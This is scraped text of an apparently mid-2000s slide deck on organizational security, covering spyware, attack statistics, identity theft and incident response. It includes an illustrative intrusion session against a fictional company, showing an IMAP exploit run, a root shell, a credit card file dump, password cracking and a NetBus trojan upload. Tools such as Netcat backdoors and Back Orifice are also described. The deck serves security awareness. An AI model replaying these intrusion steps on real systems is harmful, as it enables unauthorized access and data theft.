820 likes | 936 Vues
Designing a Secure Organization. Where are we today?. What is the Problem?. 2002-2004 Security Statistics Common Threats Identity Theft Anatomy of Attack Incident Response & Forensics Fixing The Problem. Blended Threats: A Deadly Combination.
E N D
Where are we today? What is the Problem? 2002-2004 Security Statistics Common Threats Identity Theft Anatomy of Attack Incident Response & Forensics Fixing The Problem
Blended Threats: A Deadly Combination • Blended threats combine hacking, DoS, and worm-like propagation • Can rapidly compromise millions of machines • Often spread without human interaction • Importance: • Create confidentiality breaches • Corrupt system integrity • Impact availability of data and systems, compromise patient care sadmind CodeRed Klez Worm Blaster Nimda BugBear
What is Spyware? • Spyware is a non-viral application (surveillance tool) that is loaded without the user’s knowledge and can monitor computer activity (Trojans), such as: • Keystroke tracking and capture • Email logging • Instant messaging usage and snapshots • Modifying application/OS behavior (e.g. CoolWebSearch) • Spyware and adware can increase business risks: • Theft of confidential data • Unauthorized enterprise access • Reduced PC performance • Increased bandwidth waste
How do People Get Infected? • Web browsing • Unauthorized downloads • File swapping • Email attachments • Instant messaging • Installing “legitimate software” (malicious mobile code)
The Problem is Growing Number of Spyware Reports 1,500,000 1,400,000 1,300,000 1,200,000 1,100,000 1,000,000 900,000 800,000 700,000 600,000 500,000 400,000 300,000 200,000 100,000 - Dec 03 Mar 04 Apr 04 May 04* June 04* July 04 Aug 04 Sept 04 *Estimates of average monthly increase Source:CA Security Advisory Team, Center for Pest Research
Gartner Confirms the Spyware Threat “At mid-2004, Gartner customers are seeing a surge in manifestations of ‘spyware,’ invasive methods to steal user privacy that disrupt users and their workstations at home and at work. Customers report that the cleanup effort may take a few hours, but that in no time at all, the same systems are infected again.”
Spyware Will Cost You Time and Money • Microsoft estimates that spyware is responsible for 50% of all PC crashes • Dell reports 20% of its technical support calls involve spyware Sources: InformationWeek, “Tiny, Evil Things,” George Hulme and Thomas Claburn, April 26, 2004 -and- http://www1.us.dell.com/content/topics/global.aspx/corp/pressoffice/en/2004/2004_07_20_rr_000?c=us&l=en&s=dhs&cs=19
The Effect of Spyware Spyware (Overt) • Gains a remote control capability, which includes searching and reading local files • Has a self-updating capability • Often includes a network sniffer • Can usually activate webcam or microphone • Usually logs all keystrokes Hijackers • Modify content of web pages • Block access to websites • Redirect users to unintended websites • Install hidden/backdoor processes and services that are tightly bound to OS • Disrupt websites used for mission-critical applications Adware and Cookies • Track user activity on the Internet • Collect personal information Pop-Up Ads • Collect information for cookies • Interrupt user transactions on the Internet • Flood users with ads and freeze machines • Install utilities that modify user services SECURITY THREAT SYSTEM DEGRADATION
Anti-Spyware Business Drivers • Mitigate risk and limit legal liability • Protect from unauthorized access and information theft • Reduce threat to employees, partners, customers, intellectual property, regulatory compliance and brand • Help ensure business continuity • Maintain employee productivity • Avoid business disruptions and system downtime • Reduce bandwidth waste • Reduce costs • Lack of resources to research new threats • Minimize help desk calls due to spyware infestation • Costly impact of spyware infested machines (time and money)
Anti-Spyware Complements Traditional Methods Viruses Worms Trojans Buffer Overflows IE Exploits Outlook Exploits Spyware Adware Hacker Tools Distributed Denial-of-Service Zombies Keyloggers Trojans Hack in Progress Routed Attack Port Scan
Security Statistics • General Internet attack trends are showing a 64% annual rate of growth • Symantec • The average company experiences 32 cyber-attacks per week • Checkpoint • The average measurable cost of a serious security incident in Q1/Q2 2004 was approximately $500,000 • UK Dept of Trade & Industry • Identify theft related personal information is selling for $500-$1000 per record • CFE Resource • Average of 79 new vulnerabilities per week in 2004!! • Eeye Digital Security
Statistics from the FBI & Interpol on hacking: According to the 2003 Computer Security Institute survey • 90% of companies had security breaches in the past 12 months • 80% acknowledged financial losses as a result • 40% detected denial of service attacks • 40% detected system penetration from outside • 33% detected internal attack sources The most serious and expensive losses were of proprietary information. Yet these companies seem to be doing all the right things when it comes to information security: • 90% use anti-virus software • 89% use firewalls • 60% use intrusion detection systems
More Security Statistics More vulnerabilities = higher likelihood of attack Faster attack propagation = less time to react
Common Threats • Threats • Hackers – “Script Kiddies” • Employees – former and disgruntled • Domestic Competitors – “Competitive Intelligence” • State Sponsored & Corporate Espionage • Extremists – Earth Liberation Front (ELF) ELF Federal'naya Sluzhba Bezopasnosti
Common Threats (Continued) • Physical – equipment, machinery, mines, office buildings, soft targets • Personnel – unfettered access to network-information resources, elicitation techniques, defamation of character/slander • Network/Information Assets – Network access, database and file access, web server, mail server
Anatomy of Attack • Modis Operandi • Physical Penetrations • Company Profiling – Open Source Research • Footprinting – Scanning – Enumeration – Penetration – Escalate Privilege – Stealing/Damaging Corp. information • Trojans – remote controlling systems • Buffer Overflows • Known Exploits • Port Redirection of Packets • Zone Transfers • SNMP Sweeps • Router Exploitation • Key Loggers – Software and Hardware devices • Denial of Service
Anatomy of Attack (Continued) • Physical Penetrations • Surveillance • Dumpster Diving • Impersonation of Authorized Personnel
Registrant : Big Widget, Inc. (BIGWIDGET_DOM) 1111 Big Widget Drive Really Big, CA 90120 US Domain Name: BIGWIDGET.NET Administrative Contact, Technical Contact: Zone Contact, Billing Contact: Simms, Haywood (HS69) Dodge, Rodger (RD32) hsimms@BIGWIDGET.NET rdodge@BIGWIDGET.NET 1111 Big Widget Drive, UMIL04-07 1111 Big Widget Drive, UMIL04-47 Really Big, CA 90210 Really Big, CA 90210 678-443-6001 678-443-6014 Record last updated on 24-June-2000 Record expires on 20-Mar-2010 Record created on 14-Mar-1998 Database last updated on 7-Jun-2000 15:54 Domain servers in listed order: EHECATL.BIGWIDGET.NET 10.1.1.53 NS1-AUTH.SPRINTLINK.NET 206.228.179.10 NS.COMMANDCORP.COM 130.205.70.10
hacker: ~$ telnet mail.bigwidget.net 25 Trying 10.1.1.10 ... Connected to mail.bigwidget.net Escape character is '^]'. Connection closed by foreign host. telnet mail.bigwidget.net 143 hacker:~$ Trying 10.1.1.10... Connected to mail.bigwidget.net. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU) . logout * BYE bigwidget IMAP4rev1 server terminating connection . OK LOGOUT completed Connection closed by foreign host.
hacker ~$ ./imap_exploit mail.bigwidget.com IMAP Exploit for Linux. Author: Akylonius (aky@galeb.etf.bg.ac.yu) Modifications: p1 (p1@el8.org) Completed successfully. hacker ~$ telnet mail.bigwidget.com Trying 10.1.1.10... Connected to mail.bigwidget.com. Red Hat Linux release 4.2 (Biltmore) Kernel 2.0.35 on an i686 login: root bigwidget:~# whoami root bigwidget:~# cd /etc cat ./hosts bigwidget:~# 127.0.0.1 localhost localhost.localdomain 10.1.1.9 thevault accounting 10.1.1.11 fasttalk sales 10.1.1.12 geekspeak engineering 10.1.1.13 people human resources 10.1.1.14 thelinks marketing 10.1.1.15 thesource information systems
cd /data/creditcards bigwidget:~# cat visa.txt bigwidget:~# Allan B. Smith 6543-2223-1209-4002 12/99 Donna D. Smith 6543-4133-0632-4572 06/98 Jim Smith 6543-2344-1523-5522 01/01 Joseph L.Smith 6543-2356-1882-7532 04/02 Kay L. Smith 6543-2398-1972-4532 06/03 Mary Ann Smith 6543-8933-1332-4222 05/01 Robert F. Smith 6543-0133-5232-3332 05/99 crack /etc/passwd bigwidget:~# Cracking /etc/passwd... username: bobman password: nambob username: jsmith password: redbirds username: root password: bigwidget:~# ftp thesource Connected to thesource 220 thesource Microsoft FTP Service (Version 4.0). Name: jsmith 331 Password required for jsmith. ******** Password: 230 User jsmith logged in. Remote system type is Windows_NT.
ftp> cd \temp 250 CDW command successful. send netbus.exe ftp> ftp> local: netbus.exe remote: netbus.exe 200 PORT command successful. 150 Opening BINARY mode data connection for netbus.exe 226 Transfer complete. quit ftp> thevault:~$ telnet thesource Trying 10.1.1.15. .. Connected to thesource.bigwidget.com. Escape character is '^]'. Microsoft (R) Windows 2000 Welcome to MS Telnet Service Telnet Server Build 5.00.98217.1 login: jsmith password: ******** *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> cd \temp netbus.exe C:\TEMP>
David Smith Bigwidge@bigwidget.com; Finance@BigWidget.com NetBus 1.6, by cf Postmaster < postmaster@bigwidget.com > Greetings < URGENT > Greetings Bigwidget employees: I have officially compromised your entire system, and have obtained all of your accounting information. Yours Truly, Friendly Hacker Connected to the.source.bigwidget.com Screendump
imap Anatomy of Attack (Continued) Web NetBus FTP Router Firewall Clients & Workstations
Anatomy of Attack (Continued) Malicious Code W32.Welchia.Worm W32.Blaster.Worm • Attempts to download the DCOM RPC patch from Microsoft's Windows Update Web site, install it, and then reboot the computer. • Checks for active machines to infect by sending an ICMP echo request, or PING, which will result in increased ICMP traffic. • Attempts to remove W32.Blaster.Worm • Payload: Deletes files: Deletes msblast.exe. Causes system instability: Vulnerable Windows 2000 machines will experience system instability due to the RPC service crash. Compromises security settings: Installs a TFTP server on all the infected machines • W32.Blaster.Worm is a worm that exploits the DCOM RPC vulnerability using TCP port 135. • Payload Trigger: If the date is the 16th of the month until the end of that month if it's before August, and every day from August 16 until December 31. • Payload: Performs Denial of Service against windowsupdate.com Causes system instability: May cause machines to crash. Compromises security settings: Opens a hidden remote cmd.exe shell.
Anatomy of Attack (Continued) Nmap • Nmap (Network Scanner) is an open source, freely distributed port scanner. • Designed to scan large networks rapidly. • Can be used to target specific services. • Includes features to evade Intrusion Detection. • Utilizes TCP/IP fingerprinting for remote host identification.
Anatomy of Attack (Continued) Netcat “The TCP/IP Swiss Army Knife” • Create outbound or receive inbound TCP or UPD connections • Feature - rich network debugging and “exploration” tool • Port Scanning • Remote “backdoor” shell • SYN Bombing – Denial of Service Attacks • Cryptcat - Can encrypt traffic using twofish encryption
Anatomy of Attack (Continued) Wireless Tools • Wireless network discovering and auditing tool • Decodes traffic to provide information about the network • Interfaces with GPS to track locations of discovered networks • Wireless network discovery • Displays and tracks information about wireless networks • Runs on Microsoft Windows • Wireless tool that recovers wireless encryption Key • Monitors wireless traffic passively
Anatomy of Attack (Continued) Trojans • Back Orifice – A powerful “Network Administrator” tool that is small in size, extensible, and free from CDC. • Keystroke Logger • Registry Editing • Redirection of TCP/IP connections • File Transfers • Sub-Seven – An extremely dangerous Trojan that enables full control of host • Erase harddrives • Execute programs
Anatomy of Attack (Continued) • L0ftcrack • Security experts from industry, government, and academia cite weak passwords as one of the most critical internet security threats. • L0phtCrack can obtain 18% of the passwords within 10 minutes in a recent demonstration. • 90% of the passwords were recovered within 48 hours on a Pentium II/300 • LC3 can even sniff encrypted passwords from the challenge/response exchanged when one machine authenticates to another over the network.
Anatomy of Attack (Continued) Connected to www.test.com www.test.com NetBus; UltraScan; WinFinger; SATAN; SAINT; Winnuke; BackOrfice; NMAP In addition to numerous handbooks & tutorials: Tools Used during Attacks
WEB of DECEPTION Man Charged with Using Internet to Steal Millions from Oprah, Spielberg, and Others N E W Y O R K, March 20 — A Brooklyn man has been charged with stealing millions from the rich and famous through the Internet, apparently using a public library computer to help him pull off the heist. Abraham Abdallah, 32, shown here in a police photo released March 20, allegedly masterminded the theft of identities by using computers in a Brooklyn library to obtain credit records of chief executives. (NYPD/Reuters)
Name Address Telephone number Date of birth Driver’s license # Identification card # Social Security # Personal Information • Bank account # • Utility account # • Medical Record # • Credit card # • Cell phone/pager # • Internet address
Just the facts… Types of identity theft fraud • Credit card – 42% • Telephone or utility – 20% • Bank – 13% • Employment related – 9% • Loans – 7% • Government documents/benefits – 6% • Medical Records – 19% • Attempted – 10%
How Does Identity Theft Happen? Discovery… • Applying for a loan/refinance/credit cards • Sign-in Rosters • Canadian/Netherlands Lotter: “You Have WON” • Free Credit Report Emails • Email chain letters/pyramid schemes • “Find out everything on anyone” • Questionnaires • Account Verification • Résumé's – Social Security numbers/DOB
Specific Warnings… • EBAY AND PAYPAL ACCT. VERIFICATION SCAMS, July 18, 2003Do not respond to emails from E-Bay or PayPal that ask for credit information, SSN and other personal data. ITRC is aware that many of these are scams and the country is being blanketed with them currently. • FTC WARNING—DO NOT CALL REGISTRY, confirmed May 9, 2003Companies and websites have been making deceptive claims that they can register consumers in advance for the FTC's do-not-call list. Two are being sued by the FTC at this time. These sites include: Free-Do-Not-Call-List.org and National-Do-Not-Call-List.us. Neither of these are official governmental sites. One of them is even charging a service fee. • Unauthorized "hospital personnel" asking for info, Sept. 2003here are some scam artists posing as hospital employees (and we can assume this goes on in nursing homes) asking patients to either verify information or to help fill in some blanks. They carry clipboards and may even wear hospital or lab coats. Hospital personnel must be on the lookout for these con artists and patients (and family members) must require identification prior to giving out any information.
Who to contact… • Credit card companies • Bank • Insurance Companies • Medical Providers (Hospitals, Dental Offices) • Social security • Department of Motor Vehicles • Utility company • ID Theft Clearinghouse
Prevention… • Shred any document that contains personal information • Shred unused credit solicitations • Request and review your credit report on a regular basis • NEVER give out personal information unless you initiate the process • Carefully read documents and question the use of your personal information
Incident Response & Forensic Investigations
Incident Response & Forensic Investigations FBI Cyber Crime DivisionThe FBI's Cyber Crime Division is responsible for criminal investigations of intellectual property, high tech and computer crimes. NIPC - Detect, deter, assess, warn, respond, and investigate unlawful acts involving computer and information technologies and unlawful acts, both physical and cyber, that threaten or target our critical infrastructures RCCEEG is an organization of law enforcement officers, prosecutors and computer professionals regional and surrounding counties; dedicated to providing manpower, technical and legal assistance in computer crime education and investigations.
Incident Response & Forensic Investigations FBI Agent Robert P. Hanssen • 27 year veteran with FBI • Involved in some of the most important counterintelligence cases in recent times “B” “Ramon Garcia” “Jim Baker” “G. Robertson” “Mr. Diamonds” • Searched investigative database • Hacked into the FBI’s top Russian Counterintelligence Chief’s computer – Caught, but said it was to show the vulnerability of the computer systems